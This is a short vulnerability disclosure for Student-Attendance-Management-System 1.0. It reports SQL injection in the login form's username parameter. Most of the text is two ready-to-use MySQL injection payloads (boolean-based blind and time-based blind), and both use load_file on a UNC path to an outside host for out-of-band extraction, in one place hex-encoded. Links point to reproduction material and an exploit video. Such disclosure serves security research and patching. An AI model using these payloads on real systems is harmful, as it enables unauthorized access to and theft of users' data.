## Title: Student-Attendance-Management-System 1.0 from Erick O. Omundi Multiple-SQLi ## Author: nu11secur1ty ## Date: 12.25.2022 ## Vendor: https://github.com/rickxy ## Software: https://github.com/rickxy/Student-Attendance-Management-System ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rickxy/2022/Student-Attendance-Management-System ## Description: The `username` parameter appears to be vulnerable to Multiple-SQL injection attacks. The attacker can retrieve all sensitive information about the users of this system and more bad things. ## STATUS: CRITICAL Vulnerability [+] Payload: ```MySQL --- Parameter: username (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: userType=Administrator&username=lBPxXeUT'+(select load_file('\\\\eq8r4p3b9u6gn42v38f6ca4cf3lw9oxf03sqje8.erick_from_America.com\\khw'))+'' RLIKE (SELECT (CASE WHEN (6217=6217) THEN 0x6c42507858655554+(select load_file(0x5c5c5c5c6571387234703362397536676e343276333866366361346366336c77396f7866303373716a65382e657269636b5f66726f6d5f416d65726963612e636f6d5c5c6b6877))+'' ELSE 0x28 END)) AND 'FUJm'='FUJm&password=q2H!z4n!F1&login=Login Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: userType=Administrator&username=lBPxXeUT'+(select load_file('\\\\eq8r4p3b9u6gn42v38f6ca4cf3lw9oxf03sqje8.erick_from_America.com\\khw'))+'' AND (SELECT 8687 FROM (SELECT(SLEEP(7)))btHE) AND 'XFcq'='XFcq&password=q2H!z4n!F1&login=Login --- ``` ## Reproduce: [href]()https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rickxy/2022/Student-Attendance-Management-System ## Proof and Exploit: [href](https://streamable.com/goy6ka) ## Time spent `00:30:00`